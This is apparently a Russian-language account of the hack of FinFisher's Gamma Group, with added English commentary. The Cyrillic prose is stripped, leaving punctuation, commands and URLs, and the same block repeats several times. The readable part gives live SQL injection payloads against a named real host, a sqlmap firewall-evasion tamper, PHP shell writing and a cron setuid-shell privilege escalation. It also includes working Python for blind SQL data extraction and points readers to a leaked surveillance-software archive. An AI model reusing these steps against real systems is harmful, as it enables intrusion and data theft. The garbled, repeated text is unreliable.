. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
On finsupport.finfisher.com nikto found nothing, and there was no obvious SQL injection. WhatWeb had nothing useful to say either; the application looked custom-written. That raised a question: had whoever wrote Gamma's portal built other sites on the same engine? The URLs had a distinctive layout (index.php as the front controller, scripts under Scripts/, including a file called Scripts/scripts.js.php), so a Google search:
Google: allinurl:"Scripts/scripts.js.php"
returned a handful of other sites built on the same code. One of them carried a note in its source mentioning Gamma Group, which confirmed the same developer was behind them. The point of finding sister sites is that a bug in the shared engine is a bug in the target, and the sister sites may be less carefully run. Sure enough, one of them had an SQL injection. It sat behind Apache ModSecurity, which sqlmap got past with --tamper='tamper/modsecurityversioned.py'.
Through that injection he pulled the engine's PHP source (and JavaScript) from the sister site, the same code that runs on finsupport. With the source in hand, the review is the usual checklist: LFI, checks done only in JavaScript, redirects via a Location header, and so on.
Back on finsupport: /BackOffice/ returns 403 Forbidden, but print.php turned out to be injectable (a blind injection, with no error messages to help). Compare
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
The first returns the normal page, the second an empty one: print.php drops id straight into the query. Because the parameter is numeric and the payload needs no quotes, magic_quotes was no obstacle. The MySQL user had the FILE privilege, so INTO OUTFILE could write to disk; sqlmap --file-read first pulled the PHP source, which gave the web root's path, and a PHP shell written into a web-accessible directory did the rest.
That gave a shell on the server as the web server user, and from there the next step is the same as on any other box.
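The true/false test above (id=1 and 1=1 versus id=1 and 2=1) and the remark about magic_quotes deserve a concrete illustration, so here is an added Python example that is not from the original write-up and not Gamma's code. It stands in for print.php with an in-memory SQLite database (a constructed stand-in for the portal's MySQL backend), shows the vulnerable query next to a hardened one, runs the boolean probe against both, and then goes one step further than the article by pulling a value out of the database one character at a time using only "page or no page" as an oracle. The table and column names are invented; in MySQL the unicode()/substr() pair below would be ord()/substring().

```python
import sqlite3


def build_db():
    """Constructed stand-in for the portal's MySQL backend (in-memory SQLite)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO documents VALUES (?, ?)",
                     [(1, "Release notes"), (2, "Manual")])
    return conn


def magic_quotes(value):
    """What PHP's magic_quotes_gpc did to request parameters: escape quotes
    and backslashes. A numeric injection needs none of those characters."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def print_php_vulnerable(conn, id_param):
    """Mirrors a print.php that drops an unquoted id straight into the query.
    Returns the page content (here just the title) or None for 'no document'."""
    sql = f"SELECT title FROM documents WHERE id = {magic_quotes(id_param)}"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def print_php_fixed(conn, id_param):
    """Hardened form: reject anything that is not an integer, then bind it."""
    if not id_param.isdigit():
        return None
    row = conn.execute("SELECT title FROM documents WHERE id = ?",
                       (int(id_param),)).fetchone()
    return row[0] if row else None


def boolean_probe(fetch, base_id="1"):
    """The article's check: an injectable parameter gives the normal page for
    'and 1=1' and a different (empty) page for 'and 2=1'. fetch(param) stands
    in for the HTTP request to print.php?id=param."""
    baseline = fetch(base_id)
    return (baseline is not None
            and fetch(f"{base_id} and 1=1") == baseline
            and fetch(f"{base_id} and 2=1") != baseline)


def blind_extract(fetch, subquery, max_len=64):
    """Boolean-blind extraction: recover the string returned by subquery one
    character at a time, binary-searching each code point with the same
    page/no-page oracle (MySQL equivalent: ord(substring(...)))."""
    baseline = fetch("1")
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"1 and (select unicode(substr(({subquery}),{pos},1))) > {mid}"
            if fetch(cond) == baseline:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:      # substr() past the end gives '' -> NULL -> never true
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    conn = build_db()
    vuln = lambda p: print_php_vulnerable(conn, p)
    safe = lambda p: print_php_fixed(conn, p)
    print("vulnerable injectable:", boolean_probe(vuln))   # True
    print("fixed injectable:     ", boolean_probe(safe))   # False
    print("extracted:", blind_extract(vuln, "select title from documents where id=2"))
```

Seven requests per character is what blind extraction costs with a binary search over ASCII; sqlmap does the same thing with more tricks, which is why a single boolean oracle on a numeric id is enough to read out a whole database, and why the hardened version validates the type before the value ever reaches SQL.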
 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Getting root on roughly half of Linux servers takes two scripts: Linux_Exploit_Suggester and unix-privesc-check.
finsupport ran Debian, so unix-privesc-check was the first thing tried, and it reported:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
So two lines went into /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
Then wait for cron. When the hour passes and nothing seems to happen, remember that cron keeps the server's local time, not yours: ls -l /etc/localtime shows which timezone it runs in. Here the webalizer job did run, and the setuid shell it left behind gave root.
Root on the web server is not the end of the story: the interesting data lives on the internal network, and the web server is only the foothold into it.
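The two warnings above are what a writable root-run cron script looks like, and the check is easy to reproduce. This added Python example is not from unix-privesc-check and not part of the original write-up. It audits a run-parts directory such as /etc/cron.hourly for scripts an unprivileged account could modify, and also flags the case the warning text does not spell out: a directory the account can write to lets it replace a script it cannot edit. The demo builds a throwaway directory with a constructed "webalizer" job left world-writable next to a correctly protected one; uid/gid 33 is www-data on Debian and is assumed not to own the files.

```python
import os
import shutil
import stat
import tempfile


def writable_by(st, uid, gid):
    """True if an account with this uid/gid may write to a path with stat
    result st. Ignores ACLs and capabilities; root can always write."""
    mode = st.st_mode
    if uid == 0:
        return True
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid == gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_cron_dir(cron_dir, uid, gid):
    """Report scripts under a run-parts directory (e.g. /etc/cron.hourly) that
    cron runs as root but the given unprivileged account can modify or replace.
    Returns a list of (path, reason) tuples, sorted by name."""
    findings = []
    dir_st = os.stat(cron_dir)
    # A writable directory without the sticky bit lets the account unlink a
    # root-owned script and drop its own in its place.
    dir_writable = writable_by(dir_st, uid, gid) and not dir_st.st_mode & stat.S_ISVTX
    for name in sorted(os.listdir(cron_dir)):
        path = os.path.join(cron_dir, name)
        st = os.stat(path)
        if not stat.S_ISREG(st.st_mode):
            continue
        if writable_by(st, uid, gid):
            findings.append((path, "file is writable"))
        elif dir_writable:
            findings.append((path, "directory is writable, file can be replaced"))
    return findings


def demo():
    """Constructed scenario: a temp dir standing in for /etc/cron.hourly with one
    world-writable job ('webalizer') and one correctly protected job. Returns
    the names of the jobs flagged for uid/gid 33 (www-data on Debian)."""
    d = tempfile.mkdtemp()
    try:
        for name, mode in (("webalizer", 0o777), ("mgmtlicensestatus", 0o755)):
            p = os.path.join(d, name)
            with open(p, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(p, mode)
        os.chmod(d, 0o755)
        return [os.path.basename(p) for p, _ in audit_cron_dir(d, uid=33, gid=33)]
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    for path, reason in audit_cron_dir("/etc/cron.hourly", uid=33, gid=33):
        print(f"WARNING: {path} is run by cron as root; {reason}")
    print("demo flags:", demo())   # ['webalizer']
```

Pointed at the real /etc/cron.hourly, /etc/cron.daily and friends with the uid/gid of each service account on the box, this is the defender's version of the same check: anything it prints is a root shell waiting for the next hour.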
From a foothold, the internal network is mapped the same way as the outside: nmap from the compromised host, with the nse scripts nfs-* and smb-* to find exported file shares. On finsupport this led, among other things, to an account named qateam.
What the network held is what ended up in the 40 gigabytes: FinSpy itself and the FinSpy C&C software, material on the C&C servers used by FinFisher customers, and internal Gamma Group documents.
Gamma's customer and price information and the FinSpy documentation were made public, with the release announced from a Twitter account.
For those who want to dig in themselves: the 38.7 GB archive FinSpy-PC+Mobile-2012-07-12-Final.zip is distributed by magnet link, and anyone with spare GPU time is invited to work on it!
Two practical conclusions he draws from the whole affair.
1) The way in is almost always the browser, Java, Flash or a Microsoft Office document attached to an email. Keeping the browser, Java and Flash up to date closes most of that. Gamma does sell 0day exploits (the FinSploit package, with exploits bought from VUPEN), but nothing that rare is needed: a Metasploit browser autopwn against an outdated Flash is enough against most targets.
2) By his own estimate, 95% of the work is routine use of known techniques and patience rather than anything exotic.
All 40 GB were published in full. The announcement carries his PGP signature, and part of the material is also on GitHub: https://github.com/FinFisher.
The author's recommended reading:
Hacker News, Reddit
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
https://www.corelan.be/ (start with Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
Books:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
